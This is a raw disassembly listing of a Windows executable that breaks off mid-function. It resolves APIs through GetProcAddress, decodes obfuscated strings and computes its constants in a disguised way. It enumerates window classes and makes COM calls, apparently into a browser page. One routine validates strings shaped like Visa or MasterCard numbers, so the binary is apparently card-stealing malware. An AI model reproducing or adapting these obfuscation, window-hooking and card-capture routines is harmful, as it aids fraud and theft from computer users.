call ds:dword_4491AC ; GetProcAddress
mov ds:dword_4491A8, eax
push offset word_44E7C6
call sub_43AC82
push eax
push dword_44D278
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_4499DC, eax
push offset byte_44E7AB
call sub_43AC82
push eax
push dword_44D278
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_446048, eax
push offset byte_44E797
call sub_43AC82
add esp, 3Ch
push eax
push dword_44D278
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C848, eax
pop edi
retn
sub_43B3E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B5BD proc near ; DATA XREF: .data:off_44D320�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_8]
push offset dword_44ECC4
push esi
call ds:dword_44C824
or eax, eax
jz short loc_43B5E9
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_43B631
; ---------------------------------------------------------------------------
loc_43B5E9: ; CODE XREF: sub_43B5BD+1A�j
push offset dword_44EC34
push esi
call ds:dword_44C824
or eax, eax
jz short loc_43B609
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_43B631
; ---------------------------------------------------------------------------
loc_43B609: ; CODE XREF: sub_43B5BD+3A�j
push offset dword_44EC14
push esi
call ds:dword_44C824
or eax, eax
jz short loc_43B629
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_43B631
; ---------------------------------------------------------------------------
loc_43B629: ; CODE XREF: sub_43B5BD+5A�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_43B631: ; CODE XREF: sub_43B5BD+2A�j
; sub_43B5BD+4A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_43B5BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B638 proc near ; CODE XREF: sub_43BC02+BB�p
; sub_43BC02+110�p
var_7 = byte ptr -7
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov byte ptr [ebx], 0
mov ecx, esi
or eax, 0FFFFFFFFh
loc_43B64E: ; CODE XREF: sub_43B638+1B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43B64E
mov [ebp+var_4], eax
movsx edi, word_44D0A0
sub edi, 1
jmp short loc_43B6D4
; ---------------------------------------------------------------------------
loc_43B664: ; CODE XREF: sub_43B638+9F�j
movzx eax, [ebp+arg_8]
cmp edi, eax
jb short loc_43B677
mov al, [esi+edi]
cmp al, 2Fh
jz short loc_43B677
cmp al, 2Eh
jnz short loc_43B696
loc_43B677: ; CODE XREF: sub_43B638+32�j
; sub_43B638+39�j
push offset byte_44E791
call sub_43AC82
movzx edx, byte ptr [esi+edi]
push edx
push eax
lea edx, [ebp+var_7]
push edx
call ds:dword_44C810
add esp, 10h
jmp short loc_43B6C5
; ---------------------------------------------------------------------------
loc_43B696: ; CODE XREF: sub_43B638+3D�j
push offset dword_44E78C
call sub_43AC82
push eax
push ebx
call ds:dword_446024
push offset dword_44E784
call sub_43AC82
movzx edx, byte ptr [esi+edi]
push edx
push eax
lea edx, [ebp+var_7]
push edx
call ds:dword_44C810
add esp, 1Ch
loc_43B6C5: ; CODE XREF: sub_43B638+5C�j
lea eax, [ebp+var_7]
push eax
push ebx
call ds:dword_446024
add esp, 8
inc edi
loc_43B6D4: ; CODE XREF: sub_43B638+2A�j
cmp edi, [ebp+var_4]
jb short loc_43B664
pop edi
pop esi
pop ebx
leave
retn
sub_43B638 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B6DF proc near ; DATA XREF: .data:0044D358�o
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_4]
mov eax, [ebp+arg_10]
mov word ptr [ebp+arg_10], ax
movsx eax, word_44D220
movsx edx, word_44D0B8
lea eax, [eax+edx+0EAh]
cmp edi, eax
jnz short loc_43B713
push [ebp+arg_14]
call sub_441138
pop ecx
xor eax, eax
jmp short loc_43B739
; ---------------------------------------------------------------------------
loc_43B713: ; CODE XREF: sub_43B6DF+25�j
mov eax, dword_44D15C
add eax, 0FBh
add eax, dword_44D158
cmp edi, eax
jnz short loc_43B734
push [ebp+arg_14]
call sub_43CEF8
pop ecx
xor eax, eax
jmp short loc_43B739
; ---------------------------------------------------------------------------
loc_43B734: ; CODE XREF: sub_43B6DF+46�j
mov eax, 80020003h
loc_43B739: ; CODE XREF: sub_43B6DF+32�j
; sub_43B6DF+53�j
pop edi
pop ebp
retn 24h
sub_43B6DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B73E proc near ; CODE XREF: sub_43E36B+E9�p
; sub_43EB7A+1B8�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
movsx eax, word_44D160
add eax, dword_44D118
sub eax, 0Ch
mov [ebp+var_8], eax
mov [ebp+var_C], eax
mov esi, eax
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_8]
add eax, ebx
mov [ebp+var_4], eax
mov edi, [ebp+arg_0]
jmp loc_43B867
; ---------------------------------------------------------------------------
loc_43B772: ; CODE XREF: sub_43B73E+131�j
movsx edx, byte ptr [edi]
shl edx, 2
mov esi, dword_44D384[edx]
mov eax, dword_44D1F8
sub eax, 5
neg eax
cmp esi, eax
jz loc_43B866
mov eax, [ebp+var_8]
or eax, eax
jl loc_43B863
cmp eax, 3
jg loc_43B863
jmp off_44D784[eax*4]
loc_43B7AC: ; DATA XREF: .data:off_44D784�o
inc [ebp+var_8]
jmp loc_43B863
; ---------------------------------------------------------------------------
loc_43B7B4: ; CODE XREF: sub_43B73E+67�j
; DATA XREF: .data:0044D788�o
mov edx, [ebp+var_C]
movsx ecx, word_44D0A0
add ecx, dword_44D22C
sub ecx, 3
mov eax, edx
shl eax, cl
mov [ebp+var_18], eax
mov edx, esi
and edx, 30h
mov ecx, dword_44D17C
sub ecx, 5
mov eax, edx
sar eax, cl
mov edx, [ebp+var_18]
or edx, eax
mov [ebp+var_D], dl
mov eax, ebx
inc ebx
mov dl, [ebp+var_D]
mov [eax], dl
inc [ebp+var_8]
jmp short loc_43B863
; ---------------------------------------------------------------------------
loc_43B7F5: ; CODE XREF: sub_43B73E+67�j
; DATA XREF: .data:0044D78C�o
mov edx, [ebp+var_C]
and edx, 0Fh
mov ecx, dword_44D0DC
add ecx, 4
mov eax, edx
shl eax, cl
mov [ebp+var_1C], eax
mov edx, esi
and edx, 3Ch
mov ecx, dword_44D1E4
inc ecx
mov eax, edx
sar eax, cl
mov edx, [ebp+var_1C]
or edx, eax
mov [ebp+var_D], dl
mov eax, ebx
inc ebx
mov dl, [ebp+var_D]
mov [eax], dl
inc [ebp+var_8]
jmp short loc_43B863
; ---------------------------------------------------------------------------
loc_43B830: ; CODE XREF: sub_43B73E+67�j
; DATA XREF: .data:0044D790�o
mov edx, [ebp+var_C]
and edx, 3
mov ecx, dword_44D218
add ecx, dword_44D1B0
sub ecx, 0Ah
mov eax, edx
shl eax, cl
mov edx, eax
or edx, esi
mov [ebp+var_D], dl
mov eax, ebx
inc ebx
mov dl, [ebp+var_D]
mov [eax], dl
mov eax, dword_44D124
sub eax, 2
mov [ebp+var_8], eax
loc_43B863: ; CODE XREF: sub_43B73E+58�j
; sub_43B73E+61�j ...
mov [ebp+var_C], esi
loc_43B866: ; CODE XREF: sub_43B73E+4D�j
inc edi
loc_43B867: ; CODE XREF: sub_43B73E+2F�j
cmp byte ptr [edi], 0
jz short loc_43B875
cmp ebx, [ebp+var_4]
jb loc_43B772
loc_43B875: ; CODE XREF: sub_43B73E+12C�j
cmp byte ptr [edi], 0
jnz short loc_43B881
mov eax, ebx
sub eax, [ebp+arg_4]
jmp short loc_43B891
; ---------------------------------------------------------------------------
loc_43B881: ; CODE XREF: sub_43B73E+13A�j
mov eax, dword_44D0D0
add eax, dword_44D0D8
sub eax, 5
neg eax
loc_43B891: ; CODE XREF: sub_43B73E+141�j
pop edi
pop esi
pop ebx
leave
retn
sub_43B73E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B896 proc near ; CODE XREF: sub_43CEF8+EC�p
; sub_441138+CC�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov esi, [ebp+arg_4]
push ebx
call ds:dword_446000 ; lstrlenW
mov edi, eax
push 0
push 0
mov eax, dword_44D1D0
add eax, 1FFAh
push eax
push esi
push edi
push ebx
movsx eax, word_44D1DC
sub eax, 9
push eax
push 0
call ds:dword_44600C ; WideCharToMultiByte
mov eax, dword_44D1CC
add eax, dword_44D134
sub eax, 5
mov [esi+edi], al
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_43B896 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_43B8E8 proc near ; DATA XREF: sub_43E040+161�o
var_A = byte ptr -0Ah
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov edi, [ebp+arg_0]
push offset sub_43F05F
push dword ptr fs:0
mov fs:0, esp
push offset dword_44E77C
call sub_43AC82
push dword ptr [edi]
push eax
lea esi, [ebp+var_A]
push esi
call ds:dword_44C810
add esp, 10h
loc_43B91E: ; CODE XREF: sub_43B8E8+57�j
push 0
push dword ptr [edi]
lea eax, [ebp+var_A]
push eax
call sub_43D16C
movsx eax, word_44D23C
sub eax, 5
push eax
call ds:dword_44C80C
add esp, 10h
jmp short loc_43B91E
sub_43B8E8 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B947 proc near ; CODE XREF: sub_43A39F+2E9�p
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = word ptr -38h
var_30 = dword ptr -30h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
mov eax, dword_44D22C
sub eax, 4
mov [ebp+var_4], eax
jmp short loc_43B973
; ---------------------------------------------------------------------------
loc_43B95D: ; CODE XREF: sub_43B947+40�j
mov eax, 30h
mul [ebp+var_4]
mov [ebp+var_20], eax
and ds:dword_44A540[eax], 0
inc [ebp+var_4]
loc_43B973: ; CODE XREF: sub_43B947+14�j
movsx eax, word_44D0B4
mov edx, dword_44D208
lea eax, [eax+edx+5Ah]
cmp [ebp+var_4], eax
jb short loc_43B95D
push 0
call ds:dword_449084
push offset dword_44D360
push offset dword_44ECB4
push 7
push 0
push offset dword_44EBE4
call ds:dword_4495D4
mov ebx, eax
mov eax, dword_44D1E8
movsx edx, word_44D12C
add eax, edx
sub eax, 0Fh
cmp ebx, eax
jnz loc_43BB68
lea eax, [ebp+var_C]
push eax
mov eax, dword_44D360
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov ebx, eax
mov eax, dword_44D224
movsx edx, word_44D190
add eax, edx
sub eax, 0Ah
cmp ebx, eax
jnz short loc_43B9FA
movsx eax, word_44D0E4
sub eax, 2
cmp [ebp+var_C], eax
jnz short loc_43B9FF
loc_43B9FA: ; CODE XREF: sub_43B947+A2�j
jmp loc_43BAFE
; ---------------------------------------------------------------------------
loc_43B9FF: ; CODE XREF: sub_43B947+B1�j
movsx eax, word_44D144
add eax, dword_44D0D4
sub eax, 9
mov [ebp+var_8], eax
jmp loc_43BAF2
; ---------------------------------------------------------------------------
loc_43BA17: ; CODE XREF: sub_43B947+1B1�j
mov [ebp+var_38], 3
mov eax, [ebp+var_8]
mov [ebp+var_30], eax
lea eax, [ebp+var_3C]
push eax
lea esi, [ebp+var_38]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, dword_44D360
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov ebx, eax
mov eax, dword_44D188
sub eax, 9
cmp ebx, eax
jnz loc_43BAEF
lea eax, [ebp+var_40]
push eax
push offset dword_44ECD4
mov eax, [ebp+var_3C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44D1B0
sub eax, 7
cmp ebx, eax
jnz short loc_43BAE6
lea eax, off_44D35C
mov [ebp+var_24], eax
push eax
mov esi, [eax]
call dword ptr [esi+4]
lea eax, [ebp+var_44]
push eax
push offset dword_44EC04
mov eax, [ebp+var_24]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44D1EC
add eax, dword_44D168
sub eax, 0Fh
cmp ebx, eax
jnz short loc_43BAD4
lea eax, [ebp+var_48]
push eax
push offset dword_44EC04
push [ebp+var_44]
push [ebp+var_40]
call sub_444A27
add esp, 10h
mov [ebp+var_4C], eax
mov eax, [ebp+var_44]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43BAD4: ; CODE XREF: sub_43B947+168�j
mov eax, [ebp+var_24]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_40]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43BAE6: ; CODE XREF: sub_43B947+12F�j
mov eax, [ebp+var_3C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43BAEF: ; CODE XREF: sub_43B947+107�j
inc [ebp+var_8]
loc_43BAF2: ; CODE XREF: sub_43B947+CB�j
mov eax, [ebp+var_C]
cmp [ebp+var_8], eax
jb loc_43BA17
loc_43BAFE: ; CODE XREF: sub_43B947:loc_43B9FA�j
lea eax, off_44D380
mov [ebp+var_10], eax
push eax
mov esi, [eax]
call dword ptr [esi+4]
lea eax, [ebp+var_14]
push eax
push offset dword_44EBF4
mov eax, [ebp+var_10]
push eax
mov esi, [eax]
call dword ptr ds:0[esi]
mov eax, [ebp+var_10]
push eax
mov esi, [eax]
call dword ptr [esi+8]
lea eax, [ebp+var_1C]
push eax
push offset dword_44EBF4
push [ebp+var_14]
push dword_44D360
call sub_444A27
add esp, 10h
mov [ebp+var_18], eax
mov ecx, dword_44D1B4
sub ecx, 4
cmp eax, ecx
jnz short loc_43BB68
mov eax, dword_44D360
push eax
mov esi, [eax]
call dword ptr [esi+8]
and dword_44D360, 0
loc_43BB68: ; CODE XREF: sub_43B947+78�j
; sub_43B947+20D�j
pop edi
pop esi
pop ebx
leave
retn
sub_43B947 endp
; =============== S U B R O U T I N E =======================================
sub_43BB6D proc near ; DATA XREF: sub_43F05F+7�o
mov eax, dword_44D0C8
dec eax
push eax
call ds:dword_44C840 ; ExitThread
retn
sub_43BB6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43BB7B proc near ; CODE XREF: sub_43BE21+46D�p
; sub_43BE21+489�p
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_445950
push ebx
push esi
push edi
push 5
push [ebp+arg_0]
call ds:dword_446004 ; GetWindow
mov edi, eax
loc_43BB98: ; CODE XREF: sub_43BB7B+78�j
or edi, edi
jnz short loc_43BBA0
xor eax, eax
jmp short loc_43BBF5
; ---------------------------------------------------------------------------
loc_43BBA0: ; CODE XREF: sub_43BB7B+1F�j
push 0FFFh
lea eax, [ebp+var_FFF]
push eax
push edi
call ds:dword_447FC0 ; GetClassNameA
push dword_44D1A4
push [ebp+arg_4]
lea eax, [ebp+var_FFF]
push eax
call sub_444D98
add esp, 0Ch
movsx esi, word_44D0F8
movsx ebx, word_44D160
lea esi, [esi+ebx+0FFF8h]
cmp eax, esi
jz short loc_43BBE8
mov eax, edi
jmp short loc_43BBF5
; ---------------------------------------------------------------------------
loc_43BBE8: ; CODE XREF: sub_43BB7B+67�j
push 2
push edi
call ds:dword_446004 ; GetWindow
mov edi, eax
jmp short loc_43BB98
; ---------------------------------------------------------------------------
loc_43BBF5: ; CODE XREF: sub_43BB7B+23�j
; sub_43BB7B+6B�j
pop edi
pop esi
pop ebx
leave
retn
sub_43BB7B endp
; =============== S U B R O U T I N E =======================================
sub_43BBFA proc near ; DATA XREF: .data:0044D330�o
mov eax, 80004001h
retn 10h
sub_43BBFA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43BC02 proc near ; CODE XREF: sub_43F19E+AB�p
; sub_442DF5+1C3�p ...
var_EF38 = dword ptr -0EF38h
var_EF34 = dword ptr -0EF34h
var_EF30 = dword ptr -0EF30h
var_EF2C = byte ptr -0EF2Ch
var_EF2B = byte ptr -0EF2Bh
var_EE2C = dword ptr -0EE2Ch
var_EE24 = byte ptr -0EE24h
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
mov eax, 0EF38h
call sub_445950
push ebx
push esi
push edi
mov edi, dword_44D0DC
inc edi
add edi, dword_44D214
imul edi, 3C0h
mov esi, dword_44D198
add esi, 0EA57h
add edi, esi
shl edi, 1
mov [ebp+var_EF38], edi
push edi
call sub_4458D5
add esp, 4
mov [ebp+var_EE2C], eax
movzx eax, [ebp+arg_0]
movsx edx, word_44D098
sub edx, 4
cmp eax, edx
jnz short loc_43BC7F
push offset byte_44E771
call sub_43AC82
add esp, 4
push eax
lea edi, [ebp+var_EE24]
push edi
call ds:dword_44C810
add esp, 8
jmp loc_43BD7F
; ---------------------------------------------------------------------------
loc_43BC7F: ; CODE XREF: sub_43BC02+58�j
call ds:dword_44A1EC
mov ebx, eax
mov [ebp+var_EF2C], bl
movzx eax, [ebp+arg_0]
movsx edx, word_44D190
sub edx, 3
cmp eax, edx
jnz short loc_43BCF7
mov eax, dword_44D170
add eax, dword_44D198
sub eax, 7
and eax, 0FFh
push eax
lea eax, [ebp+var_EF2B]
push eax
push [ebp+arg_8]
call sub_43B638
add esp, 0Ch
push offset byte_44E741
call sub_43AC82
add esp, 4
movzx edi, [ebp+var_EF2C]
push edi
lea edi, [ebp+var_EF2B]
push edi
push eax
lea edi, [ebp+var_EE24]
push edi
call ds:dword_44C810
add esp, 10h
jmp loc_43BD7F
; ---------------------------------------------------------------------------
loc_43BCF7: ; CODE XREF: sub_43BC02+9B�j
mov eax, dword_44D118
sub eax, 6
and eax, 0FFh
push eax
lea eax, [ebp+var_EF2B]
push eax
push dword_44D33C
call sub_43B638
add esp, 0Ch
push offset word_44E6DE
call sub_43AC82
add esp, 4
mov edi, [ebp+arg_18]
mov esi, [ebp+arg_8]
mov ebx, edi
add ebx, esi
push ebx
mov ebx, dword_44D1E4
add ebx, 4
push ebx
push [ebp+arg_1C]
push edi
push [ebp+arg_14]
movzx edi, [ebp+var_EF2C]
push edi
mov edi, esi
sub edi, [ebp+arg_C]
mov esi, dword_44D1B0
sub esi, 3
sub edi, esi
push edi
push offset dword_44A1F0
push [ebp+arg_10]
push [ebp+arg_20]
lea edi, [ebp+var_EF2B]
push edi
push eax
lea edi, [ebp+var_EE24]
push edi
call ds:dword_44C810
add esp, 34h
loc_43BD7F: ; CODE XREF: sub_43BC02+78�j
; sub_43BC02+F0�j
push [ebp+var_EF38]
push [ebp+var_EE2C]
mov eax, dword_44D1B4
movsx edx, word_44D160
add eax, edx
sub eax, 9
neg eax
push eax
lea eax, [ebp+var_EE24]
push eax
movsx eax, word_44D220
add eax, dword_44D18C
sub eax, 8
push eax
push 0
call ds:dword_44C81C ; MultiByteToWideChar
push offset dword_44E6C4
call sub_442CEF
add esp, 4
push eax
call ds:dword_446FF8
mov [ebp+var_EF30], eax
push [ebp+var_EE2C]
call ds:dword_446FF8
mov [ebp+var_EF34], eax
push eax
push [ebp+var_EF30]
mov eax, [ebp+arg_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+104h]
push [ebp+var_EF34]
call ds:dword_44CD84
push [ebp+var_EF30]
call ds:dword_44CD84
lea esp, [ebp-0EF44h]
pop edi
pop esi
pop ebx
leave
retn
sub_43BC02 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43BE21 proc near ; CODE XREF: sub_441138+B5F�p
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = dword ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2F0 = dword ptr -2F0h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C6 = byte ptr -2C6h
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = dword ptr -2BCh
var_2B8 = dword ptr -2B8h
var_2B4 = dword ptr -2B4h
var_2B0 = dword ptr -2B0h
var_2AC = dword ptr -2ACh
var_2A8 = dword ptr -2A8h
var_2A4 = dword ptr -2A4h
var_2A0 = dword ptr -2A0h
var_29C = dword ptr -29Ch
var_298 = dword ptr -298h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_284 = dword ptr -284h
var_280 = dword ptr -280h
var_27C = dword ptr -27Ch
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_253 = byte ptr -253h
var_23F = byte ptr -23Fh
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_10D = byte ptr -10Dh
var_109 = byte ptr -109h
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_102 = word ptr -102h
var_FF = byte ptr -0FFh
var_FE = byte ptr -0FEh
var_FA = byte ptr -0FAh
var_F8 = byte ptr -0F8h
var_F5 = byte ptr -0F5h
var_F4 = byte ptr -0F4h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 324h
push ebx
push esi
push edi
cmp [ebp+arg_4], 0
jz loc_43CE2F
mov eax, [ebp+arg_0]
mov al, [eax]
cmp al, 34h
jz short loc_43BE48
cmp al, 35h
jnz loc_43CE2F
loc_43BE48: ; CODE XREF: sub_43BE21+1D�j
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_43BE50: ; CODE XREF: sub_43BE21+34�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43BE50
mov [ebp+var_128], eax
mov edx, dword_44D0D8
add edx, 0Bh
cmp eax, edx
jz short loc_43BE7B
mov edx, dword_44D198
add edx, 0Ah
cmp eax, edx
jnz loc_43CE2F
loc_43BE7B: ; CODE XREF: sub_43BE21+47�j
mov ebx, dword_44D1FC
sub ebx, 4
jmp short loc_43BEAA
; ---------------------------------------------------------------------------
loc_43BE86: ; CODE XREF: sub_43BE21+9C�j
mov eax, 30h
mul ebx
mov [ebp+var_260], eax
mov eax, [ebp+arg_4]
mov edx, [ebp+var_260]
cmp ds:dword_44A540[edx], eax
jz loc_43CE2F
inc ebx
loc_43BEAA: ; CODE XREF: sub_43BE21+63�j
mov eax, dword_44D138
add eax, 5Eh
movsx edx, word_44D0A0
add eax, edx
cmp ebx, eax
jb short loc_43BE86
mov eax, dword_44D218
add eax, 0Ah
cmp [ebp+var_128], eax
jnz loc_43C0A2
mov eax, [ebp+arg_0]
mov al, [eax+4]
cmp al, 2Dh
jz short loc_43BEE5
cmp al, 20h
jnz loc_43CE2F
loc_43BEE5: ; CODE XREF: sub_43BE21+BA�j
mov eax, [ebp+arg_0]
mov al, [eax+9]
cmp al, 2Dh
jz short loc_43BEF7
cmp al, 20h
jnz loc_43CE2F
loc_43BEF7: ; CODE XREF: sub_43BE21+CC�j
mov eax, [ebp+arg_0]
mov al, [eax+0Eh]
cmp al, 2Dh
jz short loc_43BF09
cmp al, 20h
jnz loc_43CE2F
loc_43BF09: ; CODE XREF: sub_43BE21+DE�j
mov eax, dword_44D1B4
add eax, dword_44D248
mov edx, [ebp+arg_0]
mov dl, [edx]
mov [ebp+eax+var_103], dl
mov eax, dword_44D168
add eax, dword_44D0EC
mov edx, [ebp+arg_0]
mov dl, [edx+1]
mov [ebp+eax+var_10D], dl
movsx eax, word_44D1B8
add eax, dword_44D100
mov edx, [ebp+arg_0]
mov dl, [edx+2]
mov [ebp+eax+var_109], dl
movsx eax, word_44D148
mov edx, dword_44D1A0
lea eax, [eax+edx+3]
mov edx, [ebp+arg_0]
mov dl, [edx+3]
mov [ebp+eax+var_FF], dl
mov eax, dword_44D1BC
mov edx, [ebp+arg_0]
mov dl, [edx+5]
mov [ebp+eax+var_FE], dl
movsx eax, word_44D1C0
movsx edx, word_44D180
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+6]
mov byte ptr [ebp+eax+var_108], dl
movsx eax, word_44D114
add eax, dword_44D1EC
mov edx, [ebp+arg_0]
mov dl, [edx+7]
mov byte ptr [ebp+eax+var_108], dl
mov eax, dword_44D200
mov edx, [ebp+arg_0]
mov dl, [edx+8]
mov [ebp+eax+var_FE], dl
mov eax, dword_44D0D0
mov edx, [ebp+arg_0]
mov dl, [edx+0Ah]
mov [ebp+eax+var_F8], dl
mov eax, dword_44D1B0
add eax, dword_44D19C
mov edx, [ebp+arg_0]
mov dl, [edx+0Bh]
mov byte ptr [ebp+eax+var_108+2], dl
mov eax, dword_44D0F0
mov edx, [ebp+arg_0]
mov dl, [edx+0Ch]
mov [ebp+eax+var_F5], dl
mov eax, dword_44D170
add eax, 3
add eax, dword_44D1BC
mov edx, [ebp+arg_0]
mov dl, [edx+0Dh]
mov [ebp+eax+var_FF], dl
movsx eax, word_44D0F4
mov edx, [ebp+arg_0]
mov dl, [edx+0Fh]
mov [ebp+eax+var_FA], dl
mov eax, dword_44D0AC
add eax, 3
add eax, dword_44D170
mov edx, [ebp+arg_0]
mov dl, [edx+10h]
mov [ebp+eax+var_FF], dl
mov eax, dword_44D1AC
movsx edx, word_44D114
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+11h]
mov [ebp+eax+var_FF], dl
movsx eax, word_44D0B4
movsx edx, word_44D160
lea eax, [eax+edx+5]
mov edx, [ebp+arg_0]
mov dl, [edx+12h]
mov [ebp+eax+var_FF], dl
mov eax, dword_44D178
mov edx, dword_44D1D8
sub edx, 3
mov [ebp+eax+var_F4], dl
jmp short loc_43C0B1
; ---------------------------------------------------------------------------
loc_43C0A2: ; CODE XREF: sub_43BE21+AC�j
push [ebp+arg_0]
lea eax, [ebp+var_FF]
push eax
call sub_445970
loc_43C0B1: ; CODE XREF: sub_43BE21+27F�j
mov esi, dword_44D1CC
dec esi
jmp short loc_43C0CF
; ---------------------------------------------------------------------------
loc_43C0BA: ; CODE XREF: sub_43BE21+2C1�j
mov al, [ebp+esi+var_FF]
cmp al, 30h
jl short loc_43C0C9
cmp al, 39h
jle short loc_43C0CE
loc_43C0C9: ; CODE XREF: sub_43BE21+2A2�j
jmp loc_43CE2F
; ---------------------------------------------------------------------------
loc_43C0CE: ; CODE XREF: sub_43BE21+2A6�j
inc esi
loc_43C0CF: ; CODE XREF: sub_43BE21+297�j
movsx eax, word_44D128
mov edx, dword_44D178
lea eax, [eax+edx+6]
cmp esi, eax
jb short loc_43C0BA
movsx eax, word_44D0F8
movsx edx, word_44D0B8
add eax, edx
sub eax, 0Ah
mov [ebp+var_108], eax
mov eax, dword_44D0FC
movsx edx, word_44D190
mov esi, eax
add esi, edx
sub esi, 0Ch
jmp short loc_43C153
; ---------------------------------------------------------------------------
loc_43C112: ; CODE XREF: sub_43BE21+342�j
movsx eax, [ebp+esi+var_FF]
sub eax, 30h
movsx edx, word_44D0F8
inc edx
imul eax, edx
